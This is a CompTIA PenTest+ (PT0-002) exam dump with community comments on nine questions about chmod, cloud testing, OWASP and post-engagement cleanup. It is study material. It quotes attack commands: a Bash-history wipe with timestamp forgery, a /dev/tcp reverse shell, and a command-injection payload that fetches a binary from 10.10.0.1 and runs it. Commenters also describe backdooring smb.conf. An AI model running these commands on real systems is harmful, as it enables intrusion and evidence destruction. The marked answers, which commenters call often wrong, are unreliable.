PT0-002 Answers PDF
Summary
This document contains practice questions and answers for the CompTIA PenTest+ (PT0-002) exam, each followed by the community discussion of the marked answer. The questions in this section cover Linux file permissions (chmod), covering tracks by clearing the Bash history, compliance-based testing, the MITRE ATT&CK framework, the OWASP Top 10, file upload via directory traversal, cloud data exposure, staging a file over HTTP for download to a target, and post-engagement cleanup. Several of the commands discussed are explained step by step by the commenters. The material is intended for self-study; note that several commenters warn that the answers marked as correct are not always right.
Full Transcript
Question #1 (Topic 1)
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
A. chmod u+x script.sh
B. chmod u+e script.sh
C. chmod o+e script.sh
D. chmod o+x script.sh
Correct Answer: A
Reference: https://newbedev.com/chmod-u-x-versus-chmod-x
Community vote distribution: A (100%)

RRabbit (Highly Voted, 1 year, 8 months ago):
It's important to note that permissions on Linux are divided into three categories: owner, group, and others. The "u" in the argument refers to the owner of the file, "g" refers to the group and "o" refers to others. Also, the file permissions are divided into three types: read, write and execute. "r" refers to read permission, "w" refers to write permission and "x" refers to execute permission. So, this command allows the owner of the file "script.sh" to execute the file.
upvoted 16 times

outnumber_gargle024 (Highly Voted, 3 months, 3 weeks ago):
Passed yesterday - this dump is still good. Make sure you read the descriptions, because the selected answers are often wrong. Read through all of the descriptions: many of the group answers are ChatGPT 3.5 and are also incredibly wrong. The right answers to these questions are in the discussions, and people are linking sources - great for studying.
upvoted 5 times

Pass4sureclubs (Most Recent, 1 week, 4 days ago):
Selected Answer: A
Valid exam question answers.
upvoted 2 times

MeisAdriano (1 month, 2 weeks ago):
Selected Answer: A
Obviously chmod u+x script.sh.
upvoted 1 times

shezzu (2 months ago):
Anyone recently passed this exam? Is this dump still relevant? Are the PBQs the same?
upvoted 1 times

Ottris (1 month, 4 weeks ago):
I did. I agree with outnumber_gargle024: this dump is still good, but the answers selected here are often wrong. For a good result, you should check the answers from the CompTIA book. Also, during the CompTIA course in class, we figured out that sometimes CompTIA itself doesn't select the optimal solution. In this test, you must choose the correct one according to CompTIA, not always the most optimal answer.
upvoted 1 times

Rocky_sy (3 months, 1 week ago):
Nonsense question. Why would the owner need the pentester to give them permission? It makes no sense; the owner already has the permission.
upvoted 2 times

aa9ee6c (3 months, 2 weeks ago):
Just on the 52 questions: when I took the exam there were 65 questions, and 5 of them were the hardest PBQs I've seen. I've taken 4 other CompTIA exams and none of them had as few as the PenTest.
upvoted 1 times

outnumber_gargle024 (3 months, 3 weeks ago):
Testing within 48 hours - will update.
upvoted 1 times

outnumber_gargle024 (3 months, 3 weeks ago):
delete this comment fam sammy
upvoted 2 times

KBrown2021 (4 months, 3 weeks ago):
Passed my exam today by the skin of my teeth. There were 65 questions, 4 being PBQs. I made 774. Most of the questions I had weren't on here. You will need other materials unless you know your sh*t. Pay special attention to the payloads lab and make sure you actually know what goes where and not just the order. Good luck!
upvoted 5 times

aa9ee6c (3 months, 2 weeks ago):
I'm here in the same situation, KB, but I had 5 PBQs. I just missed with a 731 and was coming here hoping this would cover the ~50% of material I hadn't seen in all my other study materials. I think we had the same payload question.
upvoted 1 times

congnguyen92 (7 months, 3 weeks ago):
A. chmod u+x script.sh
upvoted 2 times

[Removed] (9 months, 3 weeks ago):
Selected Answer: A
A. chmod u+x script.sh
upvoted 1 times

Alizade (10 months, 3 weeks ago):
Selected Answer: A
A. chmod u+x script.sh
upvoted 2 times

KeToopStudy (1 year, 1 month ago):
Selected Answer: A
chmod has three types of permissions: owner, group, and others. The "u" argument stands for the owner/user, and it is the correct answer.
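The following is an added example, not the exam's text and not code posted by any commenter. It shows how the u/g/o classes and r/w/x bits described in the thread map onto the octal mode that stat reports, and walks through option A (u+x) against option D (o+x) on a throwaway script. It assumes GNU coreutils (stat -c) on Linux; the directory and file names are invented for the demo.

```bash
#!/usr/bin/env bash
# Added example (not from the exam or any comment above): decode a file's
# mode into the owner/group/other classes that chmod's u/g/o letters name,
# then show the effect of "chmod u+x" versus "chmod o+x" on a throwaway
# script. Assumes GNU coreutils (stat -c) on Linux; file names are made up.

# Report a path's permission bits as "u=rwx g=r-- o=r--", computed from the
# octal mode. A leading setuid/setgid/sticky digit, if present, is dropped.
mode_report() {
    local path=$1 mode cls bits out=""
    mode=$(stat -c %a -- "$path")      # e.g. 644, 744 or 4755
    mode=$((10#$mode % 1000))          # keep the three permission digits
    for cls in u g o; do
        case $cls in
            u) bits=$((mode / 100)) ;;
            g) bits=$((mode / 10 % 10)) ;;
            o) bits=$((mode % 10)) ;;
        esac
        out+="$cls="
        (( bits & 4 )) && out+=r || out+=-     # 4 = read
        (( bits & 2 )) && out+=w || out+=-     # 2 = write
        (( bits & 1 )) && out+=x || out+=-     # 1 = execute
        out+=" "
    done
    printf '%s\n' "${out% }"
}

# Print the classes (u, g, o) whose execute bit is set, e.g. "u" or "ugo".
# An audit that flags "o" here finds world-executable drops like the
# "chmod 777 apache" seen later in this dump.
exec_classes() {
    local report cls out=""
    report=$(mode_report "$1")
    for cls in u g o; do
        case $report in *"$cls="??x*) out+=$cls ;; esac
    done
    printf '%s\n' "$out"
}

# Walk through the question's options A and D on a fresh script.
demo() {
    local dir script
    dir=$(mktemp -d)
    script=$dir/script.sh
    printf '#!/bin/sh\necho hello\n' > "$script"
    chmod 644 "$script"                  # typical starting point: rw-r--r--
    chmod u+x "$script"                  # option A: only the owner gains x
    printf 'after u+x: %s  (can execute: %s)\n' \
        "$(mode_report "$script")" "$(exec_classes "$script")"
    chmod u-x,o+x "$script"              # option D: only "others" gain x
    printf 'after o+x: %s  (can execute: %s)\n' \
        "$(mode_report "$script")" "$(exec_classes "$script")"
    rm -rf -- "$dir"
}

demo
```

One detail the question glosses over: a shell script needs the read bit as well as the execute bit for the user running it, because the kernel starts the interpreter named on the shebang line and that interpreter then opens the script file. A binary, by contrast, runs with x alone. That is why the owner normally ends up at rwx rather than --x after the command in option A.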
upvoted 1 times

bieecop (1 year, 2 months ago):
Selected Answer: A
The chmod command is used to change the permissions of a file. In this case, the option u+x is used to grant execute permission to the file owner (u refers to the user/owner, and +x adds the execute permission). By running chmod u+x script.sh, the penetration tester is allowing the file owner to execute the shell script.
upvoted 2 times

Question #2 (Topic 1)
A penetration tester gains access to a system and establishes persistence, and then runs the following commands:
[commands shown in a screenshot that is not reproduced here; they are quoted in the discussion below]
Which of the following actions is the tester MOST likely performing?
A. Redirecting Bash history to /dev/null
B. Making a copy of the user's Bash history for further enumeration
C. Covering tracks by clearing the Bash history
D. Making decoy files on the system to confuse incident responders
Correct Answer: C
Reference: https://null-byte.wonderhowto.com/how-to/clear-logs-bash-history-hacked-linux-systems-cover-your-tracks-remain-undetected-0244768/
Community vote distribution: C (86%), other 14%

RRabbit (Highly Voted, 1 year, 8 months ago):
The Linux command "cat /dev/null > temp; touch -r .bash_history temp; mv temp .bash_history" is a combination of three commands that are executed sequentially:
"cat /dev/null > temp" - This command is used to clear the contents of a file called "temp". The contents of the special file "/dev/null" are redirected to "temp", which overwrites any existing data in the file, making the file empty.
"touch -r .bash_history temp" - This command updates the timestamp of the file "temp" to match the timestamp of another file called ".bash_history". The "-r" option specifies that the timestamp of the file ".bash_history" is used to update the timestamp of the file "temp".
"mv temp .bash_history" - This command renames or moves the file "temp" to ".bash_history". The file "temp" no longer exists and a new file called ".bash_history" is created. If a file with the same name already exists, it will be overwritten by the file "temp".
Overall, this command sequence creates an empty file called ".bash_history" with the same timestamp as an existing file with the same name and removes the original file "temp".
upvoted 14 times

RRabbit (Highly Voted, 1 year, 8 months ago):
Selected Answer: C
C. Covering tracks by clearing the Bash history
The tester is most likely performing an action of covering tracks by clearing the Bash history. The tester is redirecting the Bash history to /dev/null by using the command "cat /dev/null > temp", which will clear the content of the Bash history file. The tester is then using the command "touch -r .bash_history temp" to reset the timestamp of the temp file to match the timestamp of the Bash history file. Finally, the tester is moving the temp file to replace the Bash history file using the "mv temp .bash_history" command. This will clear the Bash history file and make it difficult for incident responders to track the tester's actions on the system.
upvoted 6 times

MeisAdriano (Most Recent, 1 month, 2 weeks ago):
Selected Answer: C
Covering tracks is the right answer.
upvoted 1 times

surfuganda (6 months, 1 week ago):
Selected Answer: C
C. Covering tracks by clearing the Bash history
Clear explanations already provided by others.
upvoted 1 times

[Removed] (9 months, 3 weeks ago):
Selected Answer: C
C. Covering tracks by clearing the Bash history
upvoted 1 times

P0wned (1 year, 3 months ago):
cat /dev/null > temp: This command creates an empty file named "temp" by redirecting the null device ("/dev/null") to the file. Essentially, it empties the contents of "temp" or creates an empty file if it doesn't exist.
touch -r .bash_history temp: The "touch" command is used to update the timestamps of files. In this case, it updates the timestamp of "temp" to match the timestamp of ".bash_history". By using the "-r" option, the timestamp of ".bash_history" is copied to "temp". This command essentially sets the same modification time for "temp" as that of ".bash_history".
mv temp .bash_history: The "mv" command is used to rename or move files. In this case, it renames "temp" to ".bash_history". As a result, the empty file created in the first command is now moved or renamed to replace the original ".bash_history" file.
The end result is that ".bash_history" is emptied and replaced with an empty file.
upvoted 1 times

cy_analyst (1 year, 7 months ago):
Selected Answer: C
The cat /dev/null command outputs nothing (since /dev/null is a special file that discards all data written to it) and the > operator redirects the output of cat /dev/null to a new file called temp. This creates a new, empty file called temp in the current working directory, and any existing contents in temp (if there were any) are overwritten with the empty output of cat /dev/null. The purpose of creating an empty file like this is to replace the contents of the .bash_history file with an empty file, effectively erasing the command history. After creating the new temp file, the touch -r .bash_history temp command sets the modification time of the temp file to match that of the original .bash_history file, so that it appears as if the .bash_history file was never modified. Finally, the mv temp .bash_history command renames the temp file to .bash_history, effectively replacing the original .bash_history file with an empty file that has the same name and modification time.
upvoted 3 times

[Removed] (1 year, 7 months ago):
C is correct.
upvoted 2 times

mypixmania (1 year, 10 months ago):
The answer is C. Try recreating it on your system.
upvoted 5 times

Manzer (1 year, 11 months ago):
Selected Answer: B
The touch -r command is used to use the timestamp of another file. There is no deleting taking place. mv temp is to move to the temp. The tester is making a copy of the file.
https://www.geeksforgeeks.org/touch-command-in-linux-with-examples/
upvoted 2 times

Question #3 (Topic 1)
A compliance-based penetration test is primarily concerned with:
A. obtaining PII from the protected network.
B. bypassing protection on edge devices.
C. determining the efficacy of a specific set of security standards.
D. obtaining specific information from the protected network.
Correct Answer: C
Community vote distribution: C (91%), other 9%

RRabbit (Highly Voted, 1 year, 8 months ago):
Selected Answer: C
C. determining the efficacy of a specific set of security standards.
A compliance-based penetration test is primarily concerned with determining whether a specific set of security standards is being met by the organization. The main goal is to assess the organization's compliance with these standards and identify any vulnerabilities or weaknesses that could potentially put sensitive data at risk. This could include testing for compliance with regulations such as HIPAA, PCI DSS, SOX, etc. It does not focus on obtaining personally identifiable information (PII) or specific information from the protected network, or on bypassing protection on edge devices.
upvoted 8 times

[Removed] (Most Recent, 9 months, 3 weeks ago):
Selected Answer: C
This is exactly what a compliance test does: it checks to see how well the security standards are performing. In order to remain compliant, the controls/standards must hold up.
upvoted 2 times

solutionz (1 year, 1 month ago):
Selected Answer: A
A. obtaining PII from the protected network.
A compliance-based penetration test focuses on assessing an organization's adherence to specific security standards and regulatory requirements. The primary concern of this type of test is to identify vulnerabilities and weaknesses in the organization's security controls and processes, especially those related to compliance with relevant regulations and standards.
Option A, obtaining PII (Personally Identifiable Information), aligns with the goal of a compliance-based penetration test. The test aims to determine whether the organization adequately protects sensitive data, such as PII, in compliance with applicable data protection laws and regulations. While options B, C, and D might be relevant in some types of penetration tests, they are not the primary focus of a compliance-based test. The main objective is to assess compliance with specific security standards and regulatory requirements, rather than actively bypassing edge devices or obtaining specific information from the protected network.
upvoted 1 times

Question #4 (Topic 1)
A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel. Which of the following would the tester MOST likely describe as a benefit of the framework?
A. Understanding the tactics of a security intrusion can help disrupt them.
B. Scripts that are part of the framework can be imported directly into SIEM tools.
C. The methodology can be used to estimate the cost of an incident better.
D. The framework is static and ensures stability of a security program over time.
Correct Answer: A
Reference: https://attack.mitre.org/
Community vote distribution: A (100%)

RRabbit (Highly Voted, 1 year, 8 months ago):
Selected Answer: A
A. Understanding the tactics of a security intrusion can help disrupt them.
The MITRE ATT&CK framework is a widely used method for describing the tactics, techniques, and procedures (TTPs) used by attackers in cyber security incidents. One of the main benefits of the framework is that it can help organizations understand the tactics used by attackers and, therefore, take steps to disrupt them or improve their defense against them. By understanding the tactics and techniques used by attackers, organizations can better identify and mitigate potential threats to their systems and data. Other benefits of the MITRE ATT&CK framework include that it can be used to help prioritize security efforts, assess the effectiveness of security controls, and measure an organization's readiness to defend against attacks. However, it should be noted that the framework is not a static one, and it's updated regularly to reflect new threats and techniques.
upvoted 12 times

MeisAdriano (Most Recent, 1 month, 2 weeks ago):
Selected Answer: A
I confirm A, because MITRE ATT&CK stands for "Adversarial Tactics, Techniques & Common Knowledge", so you use the methodology of your adversary to disrupt them.
upvoted 1 times

[Removed] (9 months, 3 weeks ago):
Selected Answer: A
A seems the most logical given the choices.
upvoted 1 times

Meep123 (11 months, 3 weeks ago):
I love you, Mr. RRabbit.
upvoted 4 times

Question #5 (Topic 1)
Which of the following BEST describe the OWASP Top 10? (Choose two.)
A. The most critical risks of web applications
B. A list of all the risks of web applications
C. The risks defined in order of importance
D. A web-application security standard
E. A risk-governance and compliance framework
F. A checklist of Apache vulnerabilities
Correct Answer: AC
Reference: https://www.synopsys.com/glossary/what-is-owasp-top-10.html
Community vote distribution: AC (100%)

RRabbit (Highly Voted, 1 year, 8 months ago):
Selected Answer: AC
A. The most critical risks of web applications
C. The risks defined in order of importance
The OWASP Top 10 is a list of the most critical web application security risks, as defined by the Open Web Application Security Project (OWASP). The list is updated every three years and it's designed to help organizations understand the most critical risks they should address in order to secure their web applications. The list is in order of importance, meaning that the risks at the top of the list are considered the most critical. The OWASP Top 10 is not a comprehensive list of all the risks of web applications, it's not a web-application security standard, it's not a risk-governance and compliance framework, and it's not a checklist of Apache vulnerabilities. It's a list of the most critical web application security risks that should be addressed in order to secure web applications.
upvoted 6 times

MeisAdriano (Most Recent, 1 month, 2 weeks ago):
Selected Answer: AC
Obviously A and C.
upvoted 1 times

Dibonddo (1 year, 1 month ago):
The correct answers are:
A. The most critical risks of web applications
C. The risks defined in order of importance
Explanation: The OWASP Top 10 is a well-known project by the Open Web Application Security Project (OWASP) that identifies and highlights the top ten most critical security risks for web applications. It provides a prioritized list of common vulnerabilities and weaknesses in web applications, helping developers and security professionals focus on addressing the most significant risks. Therefore, options A and C are the most accurate descriptions of the OWASP Top 10.
upvoted 1 times

Question #6 (Topic 1)
A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:
[file listing shown in a screenshot that is not reproduced here]
Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
A. Edit the discovered file with one line of code for remote callback.
B. Download .pl files and look for usernames and passwords.
C. Edit the smb.conf file and upload it to the server.
D. Download the smb.conf file and look at configurations.
Correct Answer: C
Community vote distribution: C (49%), A (49%)

Neolot (Highly Voted, 1 year, 11 months ago):
Selected Answer: A
Answer is A because the smb.conf file won't give you internal access to the system; it would only be effective for Remote File Inclusion (RFI), which has already been achieved.
upvoted 12 times

RRabbit (Highly Voted, 1 year, 8 months ago):
Selected Answer: C
C. Edit the smb.conf file and upload it to the server.
The URLs discovered by the penetration tester show that the vulnerability allows an attacker to upload files to the path by using directory traversal. By editing the smb.conf file (SMB is short for Server Message Block, a protocol for sharing files, printers, serial ports, and communications abstractions such as named pipes and mail slots between computers) and uploading it to the server, an attacker can modify the configuration of the SMB service and potentially gain internal access to the affected machine. Option A is not the best method because it would only allow the attacker to remotely call back, and it doesn't provide internal access. Option B is not the best method because the files are scripts and they are unlikely to contain usernames and passwords. Option D is not the best method because it would only allow the attacker to see the configuration of the SMB service; it doesn't provide internal access.
upvoted 7 times

Rube210 (Most Recent, 1 week, 1 day ago):
Selected Answer: D
smb.conf file: This file is crucial for managing Samba configurations, including access control, authentication, and file sharing. Downloading and analyzing it can reveal misconfigurations that could be exploited, making it a high-value target for attackers.
upvoted 1 times

fuzzyguzzy (3 weeks, 4 days ago):
Selected Answer: A
A. Key phrase being "gain internal access". C would grant access to credentials and the ability to change credentials, but this would only be helpful with internal access.
upvoted 2 times

MeisAdriano (1 month, 2 weeks ago):
Selected Answer: A
Not C: smb.conf is in use by the daemon, so you can't overwrite it, and you can't upload to a specific path. If you ignore that you can't overwrite it (or overwrite it and wait maybe a month until the service is restarted) and upload it to the specific canonical path, you could allow guest users into a specific directory… but too many limitations.
Not D: Downloading smb.conf could be useful in information gathering, but not in a specific attack to gain access.
Not B: None of the listed files seems to contain usernames and passwords.
It is A: because I can change an existing file to include a shell, a RAT, or an exploit to gain access to the machine, and with directory traversal I can execute this file.
upvoted 1 times

Etc_Shadow28000 (2 months, 2 weeks ago):
Selected Answer: A
The BEST method for an attacker to gain internal access to the affected machine, given the vulnerability that allows path traversal and the files discovered, would be:
A. Edit the discovered file with one line of code for remote callback.
By editing one of the .pl (Perl) script files to include a remote callback, the attacker can execute arbitrary code on the server. This can provide the attacker with a foothold into the internal network, from which further attacks can be launched.
upvoted 1 times

solutionz (1 year, 1 month ago):
Selected Answer: C
The question is presenting a scenario in which a vulnerability has been discovered that allows for directory traversal, and various files have been discovered as a result of this vulnerability. Among the files listed, one stands out as particularly interesting from a penetration testing perspective: the smb.conf file. The smb.conf file is used to configure Samba, a service that provides file and print services to SMB/CIFS clients. By either editing or examining this file, an attacker could potentially gain more information or access to the system. Among the options presented, option C, "Edit the smb.conf file and upload it to the server," would provide the best method for an attacker to potentially gain internal access to the affected machine. By modifying the smb.conf file, an attacker might be able to alter how Samba behaves, possibly opening up more vulnerabilities or providing direct access to internal resources. So the correct answer to this question would be: C. Edit the smb.conf file and upload it to the server.
upvoted 1 times

lifehacker0777 (1 year, 5 months ago):
Selected Answer: A
Option A (edit the discovered file with one line of code for remote callback) may allow the tester to execute arbitrary code on the server if successful. However, this option may not provide long-term access to the machine and may be detected and blocked by security controls. Option C (edit the smb.conf file and upload it to the server) may allow the tester to modify the configuration of the machine to gain access. This option may be more effective in gaining long-term access and may be less likely to be detected by security controls.
upvoted 1 times

cy_analyst (1 year, 5 months ago):
Selected Answer: C
To carry out this attack, an attacker could follow these general steps:
Use the vulnerability to traverse to the directory where the smb.conf file is located, which has been discovered in the given scenario.
Download a copy of the smb.conf file to the attacker's machine.
Modify the smb.conf file to include a backdoor user account, which will allow the attacker to remotely log into the system.
Upload the modified smb.conf file back to the server, replacing the original file.
Restart the Samba service to apply the changes.
Use the backdoor user account to remotely log into the affected machine and gain internal access.
upvoted 3 times

KingIT_ENG (1 year, 6 months ago):
C is the correct answer.
upvoted 1 times

KingIT_ENG (1 year, 6 months ago):
D is correct.
upvoted 1 times

[Removed] (1 year, 6 months ago):
Answer C is correct.
upvoted 2 times

kgboi (1 year, 6 months ago):
Selected Answer: C
Answer is C.
upvoted 3 times

nickwen007 (1 year, 6 months ago):
The smb.conf file is a configuration file used by the Samba software packages. It is used to configure settings related to network access and sharing, and it is located in the folder "/etc/samba". Samba is a suite of open source software that allows Windows, Linux, and Mac systems to communicate and share files with each other. It uses the SMB protocol and is commonly used to access file shares on a network.
upvoted 3 times

The_F00L (1 year, 7 months ago):
Selected Answer: C
I had initially answered C. Option A just enables remote callback, not internal access, whereas misconfigured SMB can totally be used to get into a system. Because the ratio on this question seemed wrong, I also asked ChatGPT to verify my suspicion: "editing the smb.conf file and uploading it to the server is the BEST method to help an attacker gain internal access to the affected machine, as it allows the attacker to modify the server's configuration and potentially gain access to sensitive information or execute arbitrary code. The other options are not as effective, as downloading or editing the discovered .pl files may not lead to a significant security breach". Which is pretty much what I thought, so yeah. It's C.
upvoted 3 times

[Removed] (1 year, 7 months ago):
Answer C is correct, 100%.
upvoted 3 times

Question #7 (Topic 1)
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data. Which of the following should the tester verify FIRST to assess this risk?
A. Whether sensitive client data is publicly accessible
B. Whether the connection between the cloud and the client is secure
C. Whether the client's employees are trained properly to use the platform
D. Whether the cloud applications were developed using a secure SDLC
Correct Answer: A
Community vote distribution: A (66%), B (34%)

RRabbit (Highly Voted, 1 year, 8 months ago):
Selected Answer: A
A. Whether sensitive client data is publicly accessible
When assessing the security of hosted data in a cloud environment, the first thing that should be verified is whether sensitive client data is publicly accessible. This includes checking for any misconfigurations or vulnerabilities that could allow an unauthorized person to access the data. This could be accomplished by performing web application scans, network scans, and manual testing to check for any vulnerabilities that could allow for data exfiltration or unauthorized access. It's also important to check whether the connection between the cloud and the client is secure, whether the client's employees are trained properly to use the platform, and whether the cloud applications were developed using a secure SDLC, but verifying whether sensitive client data is publicly accessible should be the primary focus.
upvoted 9 times

Etc_Shadow28000 (Most Recent, 2 months, 2 weeks ago):
Selected Answer: A
The tester should verify FIRST:
A. Whether sensitive client data is publicly accessible
Ensuring that sensitive client data is not publicly accessible is the most immediate and critical check. If such data is exposed, it represents a significant risk to the company and its clients. This verification will help identify any obvious and severe vulnerabilities that could be exploited by attackers.
upvoted 1 times

outnumber_gargle024 (3 months, 3 weeks ago):
Selected Answer: B
bravooooooooo
upvoted 1 times

j904 (5 months ago):
Selected Answer: B
B makes the most sense in a cloud scenario.
upvoted 1 times

surfuganda (6 months ago):
Selected Answer: B
Too much groupthink in these forums. Do some research, and use some tools. Get practical experience, and stop copy/pasting ChatGPT (it's just not that reliable). MY OPINION (sure, I could be wrong): The COMPANY is going to scan the CSP. The FIRST thing to do is [B]. Because if the COMPANY's connection is unsecured and intercepted, the intercepting party may have live access to the vulnerability results, and can attack before the scan is complete or before vulnerability mitigations are implemented (because mitigations can take time to implement). NOT DOING SO creates a situation where the COMPANY introduces greater risk. After [B] is implemented, the vulnerability scan may inform whether [A] is a concern.
upvoted 2 times

J0hnn13 (10 months ago):
Selected Answer: B
Ensuring the security of the connection between the client and the cloud is a fundamental aspect of cloud security. This includes assessing the encryption protocols, data-in-transit protection, and the overall security of the network connection.
upvoted 3 times

[Removed] (10 months, 1 week ago):
Selected Answer: B
When assessing the security of hosted data in a cloud environment, one of the first things to verify is the security of the connection between the cloud and the client. Therefore, the correct answer is: B. Whether the connection between the cloud and the client is secure.
upvoted 3 times

Mr_BuCk3th34D (1 year, 9 months ago):
B should be the first thing you do when assessing a cloud environment. Before anything else, you need to make sure that the connection between you (as a customer) and the cloud (as the provider) is secure; if not, there's no guarantee of the confidentiality and integrity of the information later, and you can already assume that data might be exposed, eliminating alternative A as the answer.
upvoted 2 times

bieecop (1 year, 9 months ago):
Selected Answer: A
A. That's correct.
upvoted 3 times

ma3ks (1 year, 10 months ago):
Selected Answer: A
Should be A.
upvoted 3 times

lordguck (1 year, 10 months ago):
A: as not all cloud services require a client (B).
upvoted 2 times

dcyberguy (1 year, 10 months ago):
Selected Answer: A
I'll go with A, since the company is conducting "security in the cloud". Whether its data is publicly exposed is paramount.
upvoted 3 times

petercorn (1 year, 11 months ago):
Selected Answer: A
Answer is A, as the question is asking about 'data'.
upvoted 4 times

Neolot (1 year, 11 months ago):
Selected Answer: B
I think B is the correct answer.
upvoted 2 times

Question #8 (Topic 1)
A penetration tester ran the following command on a staging server:
python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?
A. nc 10.10.51.50 9891 < exploit
B. powershell -exec bypass -f \\10.10.51.50\9891
C. bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit
D. wget 10.10.51.50:9891/exploit
Correct Answer: D
Community vote distribution: D (100%)

Neolot (Highly Voted, 1 year, 11 months ago):
Selected Answer: D
The answer is correct. https://www.redhat.com/sysadmin/simple-http-server
upvoted 7 times

RRabbit (Highly Voted, 1 year, 8 months ago):
Selected Answer: D
D. wget 10.10.51.50:9891/exploit
The command "python -m SimpleHTTPServer 9891" starts a simple HTTP server on the machine it's executed on, on port 9891. This means that the file "exploit" would be served on the IP address of the machine on port 9891. To download the file "exploit" from the HTTP server that was started, the command "wget 10.10.51.50:9891/exploit" can be used. This command uses the wget utility to download files from the web via HTTP, HTTPS and FTP. In this case, it's connecting to the IP address 10.10.51.50 and port 9891, where the exploit file is hosted, and downloading the file. Option A doesn't work because the command "nc" (netcat) is a tool that can be used to read and write data across a network; it's not used to download files. Options B and C are not valid commands that can be used to download files from a web server.
upvoted 6 times

MeisAdriano (Most Recent, 1 month, 2 weeks ago):
Selected Answer: D
I think this question is malformed, but OK. The meaning of the question is: I start a webserver on VM1 and I want to grab a file like "exploited_password.txt" from the webserver (VM1) to my machine. That's why the perfect answer is D, wget (or curl).
B. "\\10.10.51.50" is not a valid path to download files from an HTTP server; here it is a Windows shared directory path.
C. Good for creating a reverse shell, but not valid for downloading files from an HTTP server.
A. Tricky answer... Not good for a lot of reasons: this command is sending "exploited_password.txt" TO the webserver, and not getting it FROM the webserver; and netcat is not properly used to send a file to a webserver. You could, but in a different way: on my machine I execute a netcat waiting for a file; on VM1 I execute a netcat to send a file. But that means I don't need to open a webserver.
upvoted 1 times

cy_analyst (1 year, 5 months ago):
Selected Answer: D
The command "python -m SimpleHTTPServer 9891" starts a web server on the staging server, listening on port 9891. This allows clients to download files from the server using HTTP.
upvoted 1 times

nickwen007 (1 year, 6 months ago):
The command "bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit" redirects a Bash shell to the network address 10.10.51.50 on port 9891. This allows you to send and receive data over the network and can be used to exploit vulnerable services.
upvoted 2 times

nickwen007 (1 year, 6 months ago):
The command "python -m SimpleHTTPServer 9891" starts a web server using the Python SimpleHTTPServer module. It binds the web server to port 9891, making it accessible through localhost on your computer. The server can be accessed from other computers by using the IP address of your computer along with the port number.
upvoted 2 times

The_F00L (1 year, 7 months ago):
Selected Answer: D
The answer is [D]. Just try running it. [A] could also work with a bit of tweaking: echo "GET /exploit HTTP/1.1" | nc 10.10.51.50 9891
upvoted 3 times

dcyberguy (1 year, 10 months ago):
Answer D is a no-brainer.
upvoted 3 times

Question #9 (Topic 1)
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
[request shown in a screenshot that is not reproduced here; it is quoted in the discussion below]
Which of the following commands should the penetration tester run post-engagement?
A. grep -v apache ~/bash_history > ~/.bash_history
B. rm -rf /tmp/apache
C. chmod 600 /tmp/apache
D. taskkill /IM "apache" /F
Correct Answer: B
Community vote distribution: B (94%), other 6%

RRabbit (Highly Voted, 1 year, 8 months ago):
Selected Answer: B
B. rm -rf /tmp/apache
From the code snippet it appears that the penetration tester has used a POST exploit to gain access to a system and executed a command that downloads a file named "apache" from the IP address 10.10.0.1, and then runs it. The command also changes the permissions of the file to 777, which means it's giving full permissions to all users. After the engagement, the penetration tester should clean up the system and return it to its original state. One of the first steps should be to remove the "apache" file from the system using the command "rm -rf /tmp/apache" to remove the file and the folder recursively. Option A is not recommended because it's removing the apache line from the bash history, but it doesn't remove the file. Option C is not recommended because it's changing the permissions of the file, but it doesn't remove the file. Option D is not recommended because it's killing the process, but it doesn't remove the file.
upvoted 8 times

petercorn Highly Voted 1 year, 11 months ago
Selected Answer: B
B is the correct answer; answer C is wrong. Why change the permission, as it is not used anymore after the post-engagement?
upvoted 6 times

Mr_BuCk3th34D 1 year, 9 months ago
That's right, this is to cover the tracks/logs after a successful break-in.
upvoted 2 times

MeisAdriano Most Recent 1 month, 2 weeks ago
Selected Answer: B
Code explanation: an HTTP POST method will be used to send data to the server. The URL /cgi-bin/index.cgi?action=login&Path=... indicates that the exploit is trying to access a CGI script for the login action, and the Path variable contains a lot of concatenated commands!
/bin/sh$(system.IFS())-c$(system.IFS())'cd$(system.IFS())/tmp; : opens a /bin/sh shell and changes the current directory to /tmp
wget$(system.IFS())http://10.10.0.1/apache; : uses wget to download the file "apache" from a URL.
chmod${system.IFS()}777${system.IFS()}apache;
./apache'%0A%27&loginUser=a&Pwd=a : executes the downloaded "apache" file.
HTTP/1.1 indicates the version of the HTTP protocol to use.
upvoted 1 times

MeisAdriano 1 month, 2 weeks ago
system.IFS() is an Internal Field Separator, and this variable defines the delimiters used by the system to separate words and tokens, generally including spaces, tabs and new lines. In this situation it allows concatenating commands.
upvoted 1 times

MeisAdriano 1 month, 2 weeks ago
Not A. grep -v apache ~/bash_history > ~/.bash_history, because you are removing all commands with the text "apache" in the bash_history: good after an attack, but too extreme and non-surgical/non-precise, indiscriminate. (grep -v shows all rows except the matched word, so you then replace the file with the "file without the word you found".)
Not C. chmod 600 /tmp/apache. The exploit code already changed the permission to 777, why would you have to change it to less? And it doesn't remove the apache file, the best action after a post-engagement.
Not D. taskkill /IM "apache" /F, a Windows command to terminate a process. The question implicitly specifies Linux as the operating system, and all the other answers are on Linux too.
Good answer: B. rm -rf /tmp/apache
upvoted 1 times

jade290 1 year, 3 months ago
Why would it not be A. grep -v apache ~/bash_history > ~/.bash_history? This command will remove all lines from the ~/bash_history file that contain the word "apache". This covers tracks.
upvoted 2 times

KeToopStudy 9 months, 3 weeks ago
Because if you understand the snippet of code, it shows that the command injection is making the victim server download an executable into the /tmp directory, so it is clear that post exploitation you have to delete it. Clear answer is B.
upvoted 1 times

cy_analyst 1 year, 5 months ago
Selected Answer: B
The snippet of code appears to be a command injection exploit that uses the web application's login form to execute arbitrary commands on the server. The code downloads an executable named "apache" from a remote server and runs it with root privileges.
upvoted 2 times

The_F00L 1 year, 7 months ago
I totally read this as "Post exploitation" at first rather than "Post Engagement". That makes a bit of a difference LOL. B is going to be it, so you can remove installed tools from the tested device.
upvoted 5 times

ftlfrm 1 year, 5 months ago
I did the exact same thing haha.
upvoted 1 times

lordguck 1 year, 9 months ago
I would do B, as the pen tester was the person who uploaded the file and knows its content. If I found such a file on a system, C would be an option to consider.
upvoted 2 times

Neolot 1 year, 11 months ago
Selected Answer: C
